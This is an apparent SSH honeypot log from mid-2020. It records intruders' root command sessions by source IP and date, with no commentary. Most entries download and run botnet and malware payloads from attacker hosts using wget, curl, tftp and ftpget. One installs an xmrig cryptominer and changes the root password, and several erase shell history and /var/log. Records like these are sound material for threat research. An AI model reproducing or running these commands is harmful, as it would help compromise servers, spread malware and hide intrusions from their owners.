wget 41.110.24.29/bot.pl
perl bot.pl
rm -rf bot*
curl -O 41.110.24.29/bot.pl
perl bot.pl
rm -rf bot*
history -c

From 167.99.172.18 14-Apr-2020 19:41:37 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/x05010/888fff999.x86; cat 888fff999.x86 > 0x1x1x12q; chmod +x 0x1x1x12q; ./0x1x1x12q UnstableZombieArmy03; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.242/x05010/888fff999.x86
cat 888fff999.x86 > 0x1x1x12q
chmod +x 0x1x1x12q
./0x1x1x12q UnstableZombieArmy03
history -c

From 134.209.165.47 14-Apr-2020 19:42:06 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/x05010/888fff999.x86; cat 888fff999.x86 > 0x1x1x1a2q; chmod +x 0x1x1x1a2q; ./0x1x1x1a2q UnstableZombieArmy02; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.242/x05010/888fff999.x86
cat 888fff999.x86 > 0x1x1x1a2q
chmod +x 0x1x1x1a2q
./0x1x1x1a2q UnstableZombieArmy02
history -c

From 68.183.196.84 14-Apr-2020 20:41:40 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/x05010/888fff999.x86; cat 888fff999.x86 > 0x1x1x12q; chmod +x 0x1x1x12q; ./0x1x1x12q UnstableZombieArmy07; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.242/x05010/888fff999.x86
cat 888fff999.x86 > 0x1x1x12q
chmod +x 0x1x1x12q
./0x1x1x12q UnstableZombieArmy07
history -c

From 41.110.24.29 14-Apr-2020 23:20:55 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://195.144.21.176/sensi.sh; curl -O http://195.144.21.176/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 195.144.21.176 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 195.144.21.176; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 195.144.21.176 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://195.144.21.176/sensi.sh
curl -O http://195.144.21.176/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 195.144.21.176 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 195.144.21.176
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 195.144.21.176 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 134.122.57.124 15-Apr-2020 04:42:20 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/x05010/888fff999.x86; cat 888fff999.x86 > 12q1q3dfggf; chmod +x 12q1q3dfggf; ./12q1q3dfggf UnstableZombieArmy04; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.242/x05010/888fff999.x86
cat 888fff999.x86 > 12q1q3dfggf
chmod +x 12q1q3dfggf
./12q1q3dfggf UnstableZombieArmy04
history -c

From 104.244.73.16 16-Apr-2020 07:53:28 ssh2 root
Exec cd /tmp; wget http://ionage.theworkpc.com:8088/sh.sh; curl -O http://ionage.theworkpc.com:8088/sh.sh; sh sh.sh; rm -rf sh.sh
cd /tmp
wget http://ionage.theworkpc.com:8088/sh.sh
curl -O http://ionage.theworkpc.com:8088/sh.sh
sh sh.sh
rm -rf sh.sh

From 104.154.244.76 16-Apr-2020 09:32:20 ssh2 root
Exec cat /etc/issue ; cd /tmp ;  rm -rf bot* ; wget 41.110.24.29/bot.pl ; curl -O 34.83.130.37/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c
cat /etc/issue
cd /tmp
rm -rf bot*
wget 41.110.24.29/bot.pl
curl -O 34.83.130.37/bot.pl
perl bot.pl
rm -rf bot*
history -c

From 35.222.66.88 16-Apr-2020 10:09:31 ssh2 root
Exec cat /etc/issue ; cd /tmp ; rm -rf bot* ; wget 195.144.21.176/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 195.144.21.176/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
cd /tmp
rm -rf bot*
wget 195.144.21.176/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 195.144.21.176/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 62.171.183.29 17-Apr-2020 07:05:09 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://139.99.180.74/Reaper.sh; chmod 777 Reaper.sh; sh Reaper.sh; tftp 139.99.180.74 -c get Reapertftp1.sh; chmod 777 Reapertftp1.sh; sh Reapertftp1.sh; tftp -r Reapertftp2.sh -g 139.99.180.74; chmod 777 Reapertftp2.sh; sh Reapertftp2.sh; rm -rf Reaper.sh Reapertftp1.sh Reapertftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://139.99.180.74/Reaper.sh
chmod 777 Reaper.sh
sh Reaper.sh
tftp 139.99.180.74 -c get Reapertftp1.sh
chmod 777 Reapertftp1.sh
sh Reapertftp1.sh
tftp -r Reapertftp2.sh -g 139.99.180.74
chmod 777 Reapertftp2.sh
sh Reapertftp2.sh
rm -rf Reaper.sh Reapertftp1.sh Reapertftp2.sh
rm -rf *

From 51.79.157.173 18-Apr-2020 00:01:51 ssh2 root
Exec nproc ; wget https://filepush.co/pdHJ/xmrig ; wget https://filepush.co/c8z8/config.json ; chmod +x * ; sysctl -w vm.nr_hugepages=12008 ; ./xmrig -B ;  yes AloneInTheDark | passwd root ;
nproc
wget https://filepush.co/pdHJ/xmrig
wget https://filepush.co/c8z8/config.json
chmod +x *
sysctl -w vm.nr_hugepages=12008
./xmrig -B
yes AloneInTheDark | passwd root

From 34.87.0.175 20-Apr-2020 01:00:24 ssh2 root
Exec cat /etc/issue ; cd /tmp ;  rm -rf bot* ; wget 51.91.140.218/bot.pl ; perl bot.pl ; rm -rf bot* ; curl -O 51.91.140.218/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c
cat /etc/issue
cd /tmp
rm -rf bot*
wget 51.91.140.218/bot.pl
perl bot.pl
rm -rf bot*
curl -O 51.91.140.218/bot.pl
perl bot.pl
rm -rf bot*
history -c

From 45.95.168.133 20-Apr-2020 21:43:01 ssh2 root
Exec wget http://45.95.168.127/Arceus.sh; chmod 777 Arceus.sh; ./Arceus.sh
wget http://45.95.168.127/Arceus.sh
chmod 777 Arceus.sh
./Arceus.sh

From 51.68.226.22 23-Apr-2020 14:29:32 ssh2 root
Exec grep -c ^processor /proc/cpuinfo
grep -c ^processor /proc/cpuinfo

From 45.95.168.131 25-Apr-2020 14:36:06 ssh2 root
Exec wget http://45.95.168.127/zeros6x.sh; chmod 777 zeros6x.sh; ./zeros6x.sh
wget http://45.95.168.127/zeros6x.sh
chmod 777 zeros6x.sh
./zeros6x.sh

From 195.231.11.179 26-Apr-2020 00:53:03 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://107.172.157.176/Cipher.sh; chmod 777 Cipher.sh; sh Cipher.sh; tftp 107.172.157.176 -c get Ciphertftp1.sh; chmod 777 Ciphertftp1.sh; sh Ciphertftp1.sh; tftp -r Ciphertftp2.sh -g 107.172.157.176; chmod 777 Ciphertftp2.sh; sh Ciphertftp2.sh; rm -rf Cipher.sh Ciphertftp1.sh Ciphertftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://107.172.157.176/Cipher.sh
chmod 777 Cipher.sh
sh Cipher.sh
tftp 107.172.157.176 -c get Ciphertftp1.sh
chmod 777 Ciphertftp1.sh
sh Ciphertftp1.sh
tftp -r Ciphertftp2.sh -g 107.172.157.176
chmod 777 Ciphertftp2.sh
sh Ciphertftp2.sh
rm -rf Cipher.sh Ciphertftp1.sh Ciphertftp2.sh
rm -rf *

From 217.61.7.239 26-Apr-2020 06:27:27 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://37.49.226.182/astrobins.sh; chmod 777 astrobins.sh; sh astrobins.sh; tftp 37.49.226.182 -c get astrotftp1.sh; chmod 777 astrotftp1.sh; sh astrotftp1.sh; tftp -r astrotftp2.sh -g 37.49.226.182; chmod 777 astrotftp2.sh; sh astrotftp2.sh; rm -rf astrobins.sh astrotftp1.sh astrotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://37.49.226.182/astrobins.sh
chmod 777 astrobins.sh
sh astrobins.sh
tftp 37.49.226.182 -c get astrotftp1.sh
chmod 777 astrotftp1.sh
sh astrotftp1.sh
tftp -r astrotftp2.sh -g 37.49.226.182
chmod 777 astrotftp2.sh
sh astrotftp2.sh
rm -rf astrobins.sh astrotftp1.sh astrotftp2.sh
rm -rf *

From 37.49.226.212 1-May-2020 11:24:18 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://176.32.35.22/shoppinglistbins.sh; chmod 777 shoppinglistbins.sh; sh shoppinglistbins.sh; tftp 185.172.110.221 -c get shoppinglisttftp1.sh; chmod 777 shoppinglisttftp1.sh; sh shoppinglisttftp1.sh; tftp -r shoppinglisttftp2.sh -g 185.172.110.221; chmod 777 shoppinglisttftp2.sh; sh shoppinglisttftp2.sh; rm -rf shoppinglistbins.sh shoppinglisttftp1.sh shoppinglisttftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://176.32.35.22/shoppinglistbins.sh
chmod 777 shoppinglistbins.sh
sh shoppinglistbins.sh
tftp 185.172.110.221 -c get shoppinglisttftp1.sh
chmod 777 shoppinglisttftp1.sh
sh shoppinglisttftp1.sh
tftp -r shoppinglisttftp2.sh -g 185.172.110.221
chmod 777 shoppinglisttftp2.sh
sh shoppinglisttftp2.sh
rm -rf shoppinglistbins.sh shoppinglisttftp1.sh shoppinglisttftp2.sh
rm -rf *

From 37.49.226.211 4-May-2020 05:39:03 ssh2 root
Exec cd /tmp; wget http://185.244.150.141/x86; chmod 777 *; ./x86 servers; rm -rf *
cd /tmp
wget http://185.244.150.141/x86
chmod 777 *
./x86 servers
rm -rf *

From 34.68.119.229 5-May-2020 01:36:02 ssh2 root
Exec cat /etc/issue ; cd /tmp; wget http://133.167.105.83/gtop.sh || curl -O http://133.167.105.83/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; busybox tftp 133.167.105.83 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 133.167.105.83; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.32.234.129/Hilix.sh; curl -O http://45.32.234.129/Hilix.sh; chmod 777 Hilix.sh; sh Hilix.sh; tftp 45.32.234.129 -c get Hilix3.sh; chmod 777 Hilix3.sh; sh Hilix3.sh; tftp -r Hilix2.sh -g 45.32.234.129; chmod 777 Hilix2.sh; sh Hilix2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.32.234.129 Hilix1.sh Hilix1.sh; sh Hilix1.sh; rm -rf Hilix.sh Hilix3.sh Hilix2.sh Hilix1.sh; rm -rf *
cat /etc/issue
cd /tmp
wget http://133.167.105.83/gtop.sh || curl -O http://133.167.105.83/gtop.sh
chmod 777 gtop.sh
sh gtop.sh
busybox tftp 133.167.105.83 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
busybox tftp -r tftp2.sh -g 133.167.105.83
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf gtop.sh tftp1.sh tftp2.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.32.234.129/Hilix.sh
curl -O http://45.32.234.129/Hilix.sh
chmod 777 Hilix.sh
sh Hilix.sh
tftp 45.32.234.129 -c get Hilix3.sh
chmod 777 Hilix3.sh
sh Hilix3.sh
tftp -r Hilix2.sh -g 45.32.234.129
chmod 777 Hilix2.sh
sh Hilix2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.32.234.129 Hilix1.sh Hilix1.sh
sh Hilix1.sh
rm -rf Hilix.sh Hilix3.sh Hilix2.sh Hilix1.sh
rm -rf *

From 31.220.1.210 6-May-2020 21:25:10 ssh2 root
Exec cd /tmp; wget http://31.220.40.9/ABCDEFGHIJKLMNOPQRSTUVWXYZ/whoareyou.x86; chmod 777 *; ./whoareyou.x86 servers; rm -rf *
cd /tmp
wget http://31.220.40.9/ABCDEFGHIJKLMNOPQRSTUVWXYZ/whoareyou.x86
chmod 777 *
./whoareyou.x86 servers
rm -rf *

From 173.212.220.105 7-May-2020 04:52:53 ssh2 root
Exec echo 'RyM_Gang'
echo 'RyM_Gang'

From 173.212.220.105 7-May-2020 06:00:46 ssh2 root
Exec cd /tmp; wget http://194.36.188.170/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; rm -rf ssh.sh
cd /tmp
wget http://194.36.188.170/ssh.sh
chmod 777 ssh.sh
sh ssh.sh
rm -rf ssh.sh

From 74.208.29.33 7-May-2020 06:26:09 ssh2 root
apt-get install postfix
service postfix restart
/etc/pm/init.d/ postfix restart
/etc/init.d/postfix restart
locate postfix
apt-get install mlocate
lcoate postfix
locate postfix
service postfix restart
postfix restart

From 37.49.226.211 7-May-2020 14:26:32 ssh2 root
Exec cd /tmp; wget http://45.129.2.190/x86; chmod 777 *; ./x86 servers; rm -rf *
cd /tmp
wget http://45.129.2.190/x86
chmod 777 *
./x86 servers
rm -rf *

From 5.101.151.83 8-May-2020 05:07:16 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://45.95.168.207/EkSgbins.sh; chmod 777 EkSgbins.sh; sh EkSgbins.sh; tftp 45.95.168.207 -c get EkSgtftp1.sh; chmod 777 EkSgtftp1.sh; sh EkSgtftp1.sh; tftp -r EkSgtftp2.sh -g 45.95.168.207; chmod 777 EkSgtftp2.sh; sh EkSgtftp2.sh; rm -rf EkSgbins.sh EkSgtftp1.sh EkSgtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://45.95.168.207/EkSgbins.sh
chmod 777 EkSgbins.sh
sh EkSgbins.sh
tftp 45.95.168.207 -c get EkSgtftp1.sh
chmod 777 EkSgtftp1.sh
sh EkSgtftp1.sh
tftp -r EkSgtftp2.sh -g 45.95.168.207
chmod 777 EkSgtftp2.sh
sh EkSgtftp2.sh
rm -rf EkSgbins.sh EkSgtftp1.sh EkSgtftp2.sh
rm -rf *

From 35.203.79.78 8-May-2020 08:32:00 ssh2 root
Exec cat /etc/issue ; cd /tmp; wget http://133.167.105.83/gtop.sh || curl -O http://133.167.105.83/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; busybox tftp 133.167.105.83 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 133.167.105.83; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf gtop.sh tftp1.sh tftp2.sh
cat /etc/issue
cd /tmp
wget http://133.167.105.83/gtop.sh || curl -O http://133.167.105.83/gtop.sh
chmod 777 gtop.sh
sh gtop.sh
busybox tftp 133.167.105.83 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
busybox tftp -r tftp2.sh -g 133.167.105.83
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf gtop.sh tftp1.sh tftp2.sh

From 158.176.180.62 8-May-2020 09:27:03 ssh2 root
Exec cat /etc/issue ; nproc
cat /etc/issue
nproc

From 35.154.2.242 8-May-2020 09:42:43 ssh2 root
Exec uname -a ;
uname -a

From 195.231.11.144 8-May-2020 10:22:13 ssh2 root
Exec wget http://104.168.96.168/x86; chmod 777 x86; ./x86 ROOTS
wget http://104.168.96.168/x86
chmod 777 x86
./x86 ROOTS

From 37.49.226.19 8-May-2020 18:17:22 ssh2 root
Exec cd /tmp; wget http://192.236.155.130/x86; chmod 777 *; ./x86 servers; rm -rf *
cd /tmp
wget http://192.236.155.130/x86
chmod 777 *
./x86 servers
rm -rf *

From 185.53.88.182 8-May-2020 18:57:42 ssh2 root
Exec wget http://185.53.88.182/AB4g5/kiga.x86; chmod 777 kiga.x86; ./kiga.x86 ROOTS
wget http://185.53.88.182/AB4g5/kiga.x86
chmod 777 kiga.x86
./kiga.x86 ROOTS

From 88.231.63.158 8-May-2020 20:33:20 ssh2 root
history
ws
ls
w
wo
who
cat /etc/redhat-release
history

From 64.180.216.27 8-May-2020 23:03:11 ssh2 root
Exec echo "cd /tmp; wget http://46.246.37.136/wget.sh || curl http://46.246.37.136/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
wget http://46.246.37.136/wget.sh || curl http://46.246.37.136/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 5.101.151.83 9-May-2020 03:10:51 ssh2 root
Exec wget http://45.95.168.207/jKira.x86; chmod 777 jKira.x86; ./jKira.x86 AutoRoots
wget http://45.95.168.207/jKira.x86
chmod 777 jKira.x86
./jKira.x86 AutoRoots

From 195.231.11.201 9-May-2020 12:32:30 ssh2 root
Exec wget http://195.123.213.216/HORNY1/x86; chmod 777 x86; ./x86 test
wget http://195.123.213.216/HORNY1/x86
chmod 777 x86
./x86 test

From 178.79.189.143 17-May-2020 20:53:23 ssh2 root
Exec cd /tmp; wget http://185.172.110.240/loader.sh; chmod 777 loader.sh; sh loader.sh; rm -rf loader.sh
cd /tmp
wget http://185.172.110.240/loader.sh
chmod 777 loader.sh
sh loader.sh
rm -rf loader.sh

From 34.92.52.16 23-May-2020 09:10:38 ssh2 root
Exec cat /etc/issue ; cd /tmp ; rm -rf x86 ; wget 93.114.82.154/x86 ; chmod 777 x86 ; ./x86 ; rm -rf x86 ; history -c ; echo nite was here > nitewashere
cat /etc/issue
cd /tmp
rm -rf x86
wget 93.114.82.154/x86
chmod 777 x86
./x86
rm -rf x86
history -c
echo nite was here > nitewashere

From 119.251.181.196 24-May-2020 10:46:08 ssh2 root
²é¿´ÏµÍ³ÄÚºË
uname -a
ps -aux

From 119.251.181.196 24-May-2020 10:52:17 ssh2 root
wget --no-check-certificate https://raw.github.com/Lozy/danted/master/install.sh -O install.sh
bash install.sh --port=19999 --user=qq01 --passwd=a123456a
yum -y install wget
wget -q -N --no-check-certificate https://raw.githubusercontent.com/wyx176/Socks5/master/install.sh
bash install.sh
yum install gcc
apt-get inatall gcc
wget http://103.19.3.180:5523/12345
yum -y install wget

From 221.228.72.222 27-May-2020 09:13:49 ssh2 root
Exec uname -a & lscpu
uname -a
lscpu
Exec uname -a & lscpu
uname -a
lscpu
Exec uname -a & lscpu
uname -a
lscpu
Exec uname -a & lscpu
uname -a
lscpu

From 221.228.72.222 27-May-2020 09:13:50 ssh2 root
Exec uname -a & lscpu
uname -a
lscpu
Exec uname -a & lscpu
uname -a
lscpu

From 221.228.72.222 27-May-2020 09:13:50 ssh2 root
Exec uname -a & lscpu
uname -a
lscpu
Exec uname -a & lscpu
uname -a
lscpu
Exec uname -a & lscpu
uname -a
lscpu

From 37.120.211.124 27-May-2020 11:25:26 ssh2 root
Exec df -h
df -h

From 194.99.105.248 28-May-2020 00:31:41 ssh2 root
df -h
uname -a
mkdir /var/run/logging.service
mkdir
ls
cd Ma
ls
cd Mail
ls
cd /
ls
mkdir
wget
ls

From 194.99.105.248 28-May-2020 00:34:32 ssh2 root
df -h
ls

From 185.192.70.77 2-Jun-2020 20:12:41 ssh2 root
w
nproc
uname-a

From 85.209.0.102 2-Jun-2020 20:12:50 ssh2 root
uname
cat /etc/lease
ifconfig
w
top
wget
cd /tmp
ls -a

From 185.192.70.77 2-Jun-2020 20:15:00 ssh2 root
wget 185.162.235.222/e

From 185.192.70.77 2-Jun-2020 20:15:28 ssh2 root
wget 1http://
history
ps x
kill -9 22262
ps x
ls -la /proc/17509

From 185.192.70.77 2-Jun-2020 20:17:01 ssh2 root
wget http://192.254.204.95/Scanmd2019.jpg
wget
wget -c http://192.254.204.95/Scanmd2019.jpg
ls -a
./test.pl
nano
pico
vim
vi
cat
cat test.pl

From 51.81.53.159 3-Jun-2020 17:30:21 ssh2 root
Exec cat /etc/issue ; cd /tmp ; rm -rf bot* ; wget https://filepush.co/Vp2p/bot.pl | curl -O https://filepush.co/Vp2p/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c ; rm -rf /var/log ; rm -rf /tmp/logs ; history -c
cat /etc/issue
cd /tmp
rm -rf bot*
wget https://filepush.co/Vp2p/bot.pl | curl -O https://filepush.co/Vp2p/bot.pl
perl bot.pl
rm -rf bot*
history -c
rm -rf /var/log
rm -rf /tmp/logs
history -c

From 46.246.49.79 3-Jun-2020 17:53:45 ssh2 root
Exec echo "cat /proc/*/mounts" | sh
echo "cat /proc/*/mounts" | sh

From 144.172.73.34 6-Jun-2020 00:15:32 ssh2 root
Exec echo test
echo test

From 163.172.129.13 7-Jun-2020 12:57:51 ssh2 root
Exec cat /etc/issue ; cd /tmp ; rm -rf bot* ; wget 163.172.129.13/bot.pl ; curl -O 163.172.129.13/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c ; rm -rf /var/log ; rm -rf /tmp/logs ; history -c
cat /etc/issue
cd /tmp
rm -rf bot*
wget 163.172.129.13/bot.pl
curl -O 163.172.129.13/bot.pl
perl bot.pl
rm -rf bot*
history -c
rm -rf /var/log
rm -rf /tmp/logs
history -c

From 62.210.107.220 11-Jun-2020 09:33:37 ssh2 root
Exec cat /etc/issue ; cd /tmp ; rm -rf bot* ; wget 62.210.107.220/bot.pl ; curl -O 62.210.107.220/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c ; rm -rf /var/log ; rm -rf /tmp/logs
cat /etc/issue
cd /tmp
rm -rf bot*
wget 62.210.107.220/bot.pl
curl -O 62.210.107.220/bot.pl
perl bot.pl
rm -rf bot*
history -c
rm -rf /var/log
rm -rf /tmp/logs

From 93.157.62.102 14-Jun-2020 06:16:02 ssh2 root
Exec wget http://185.172.110.214/AB4g5/kiga.x86; chmod 777 *; ./kiga.x86 Roots;rm -rf kiga.x86; history -c
wget http://185.172.110.214/AB4g5/kiga.x86
chmod 777 *
./kiga.x86 Roots
rm -rf kiga.x86
history -c

From 59.127.135.77 18-Jun-2020 20:02:58 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.40.75/bin.sh || curl http://46.246.40.75/curl.sh -o curl.sh; chmod +x *.sh; ./bin.sh; ./curl.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.40.75/bin.sh || curl http://46.246.40.75/curl.sh -o curl.sh
chmod +x *.sh
./bin.sh
./curl.sh' | sh

From 162.247.73.192 19-Jun-2020 22:13:00 ssh2 root
Exec echo HOIQ9MK2P6
echo HOIQ9MK2P6

From 104.244.76.189 20-Jun-2020 15:50:05 ssh2 root
Exec echo 0jquhkhtm5e2yv08
echo 0jquhkhtm5e2yv08

From 23.129.64.217 20-Jun-2020 15:53:50 ssh2 root
Exec echo e5s6376onuuy72up
echo e5s6376onuuy72up

From 67.225.190.237 21-Jun-2020 10:12:44 ssh2 root
Exec echo NGONH9QH4A
echo NGONH9QH4A

From 205.185.125.216 24-Jun-2020 22:58:58 ssh2 root
Exec echo UGKSCIZ1WA
echo UGKSCIZ1WA

From 194.180.224.130 26-Jun-2020 03:59:18 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://isupreme.ir/r00xl.sh; curl -O http://isupreme.ir/r00xl.sh; chmod 777 r00xl.sh; sh r00xl.sh; tftp isupreme.ir -c get r00xl.sh; chmod 777 r00xl.sh; sh r00xl.sh; tftp -r r00xl2.sh -g isupreme.ir; chmod 777 r00xl2.sh; sh r00xl2.sh; ftpget -v -u anonymous -p anonymous -P 21 isupreme.ir r00xl1.sh r00xl1.sh; sh r00xl1.sh; rm -rf r00xl.sh r00xl.sh r00xl2.sh r00xl1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://isupreme.ir/r00xl.sh
curl -O http://isupreme.ir/r00xl.sh
chmod 777 r00xl.sh
sh r00xl.sh
tftp isupreme.ir -c get r00xl.sh
chmod 777 r00xl.sh
sh r00xl.sh
tftp -r r00xl2.sh -g isupreme.ir
chmod 777 r00xl2.sh
sh r00xl2.sh
ftpget -v -u anonymous -p anonymous -P 21 isupreme.ir r00xl1.sh r00xl1.sh
sh r00xl1.sh
rm -rf r00xl.sh r00xl.sh r00xl2.sh r00xl1.sh
rm -rf *

From 66.55.92.15 26-Jun-2020 06:57:59 ssh2 root
Exec echo "PROC:`grep -c ^processor /proc/cpuinfo` VER:`uname -a`";(curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 http://do-dear.com/bots/zax  2>/dev/null || wget -q --connect-timeout 5 --timeout 10 --tries 2 -O- http://do-dear.com/bots/zax  2>/dev/null) | perl >/dev/null 2>&1
echo "PROC:`grep -c ^processor /proc/cpuinfo` VER:`uname -a`"
(curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 http://do-dear.com/bots/zax 2>/dev/null || wget -q --connect-timeout 5 --timeout 10 --tries 2 -O- http://do-dear.com/bots/zax 2>/dev/null) | perl >/dev/null 2>
1

From 51.75.52.118 26-Jun-2020 18:18:41 ssh2 root
Exec echo 4PYT5GLP0Q
echo 4PYT5GLP0Q

From 209.141.39.98 28-Jun-2020 16:16:18 ssh2 root
Exec echo I3RS2BN0F7
echo I3RS2BN0F7

From 40.71.33.88 28-Jun-2020 20:18:27 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec sudo echo $UID
sudo echo $UID

From 67.225.190.237 1-Jul-2020 07:26:36 ssh2 root
Exec echo 3FIDGUUKMR
echo 3FIDGUUKMR

From 137.117.92.108 2-Jul-2020 02:34:01 ssh2 root
Exec sudo echo $UID
sudo echo $UID

From 185.165.168.229 3-Jul-2020 16:36:09 ssh2 root
Exec echo MG7ZO7T3JX
echo MG7ZO7T3JX

From 51.195.136.190 3-Jul-2020 16:50:07 ssh2 root
Exec echo ME7V4Z9ROM
echo ME7V4Z9ROM

From 45.143.220.79 3-Jul-2020 23:40:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.82.70.140/kwari.sh; curl -O http://80.82.70.140/kwari.sh; chmod 777 kwari.sh; sh kwari.sh; tftp 80.82.70.140 -c get kwari.sh; chmod 777 kwari.sh; sh kwari.sh; tftp -r kwari2.sh -g 80.82.70.140; chmod 777 kwari2.sh; sh kwari2.sh; ftpget -v -u anonymous -p anonymous -P 21 80.82.70.140 kwari1.sh kwari1.sh; sh kwari1.sh; rm -rf kwari.sh kwari.sh kwari2.sh kwari1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://80.82.70.140/kwari.sh
curl -O http://80.82.70.140/kwari.sh
chmod 777 kwari.sh
sh kwari.sh
tftp 80.82.70.140 -c get kwari.sh
chmod 777 kwari.sh
sh kwari.sh
tftp -r kwari2.sh -g 80.82.70.140
chmod 777 kwari2.sh
sh kwari2.sh
ftpget -v -u anonymous -p anonymous -P 21 80.82.70.140 kwari1.sh kwari1.sh
sh kwari1.sh
rm -rf kwari.sh kwari.sh kwari2.sh kwari1.sh
rm -rf *

From 46.246.38.61 4-Jul-2020 00:30:14 ssh2 root
Exec cd /tmp; wget http://46.246.38.61/wget.sh -O - | sh
cd /tmp
wget http://46.246.38.61/wget.sh -O - | sh

From 185.220.101.212 7-Jul-2020 08:18:32 ssh2 root
Exec echo Z9JG5YNFM8
echo Z9JG5YNFM8

From 162.247.73.192 7-Jul-2020 08:18:34 ssh2 root
Exec echo ERSZKWPG2Z
echo ERSZKWPG2Z

From 45.143.220.55 7-Jul-2020 11:26:48 ssh2 root
Exec cd /tmp; wget http://45.143.220.55/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86; chmod 777 infn.x86; ./infn.x86 servers; rm -rf *
cd /tmp
wget http://45.143.220.55/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86
chmod 777 infn.x86
./infn.x86 servers
rm -rf *

From 64.227.26.221 7-Jul-2020 22:21:45 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://45.95.168.196/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 45.95.168.196 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 45.95.168.196; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://45.95.168.196/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 45.95.168.196 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 45.95.168.196
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 194.180.224.103 8-Jul-2020 09:21:41 ssh2 root
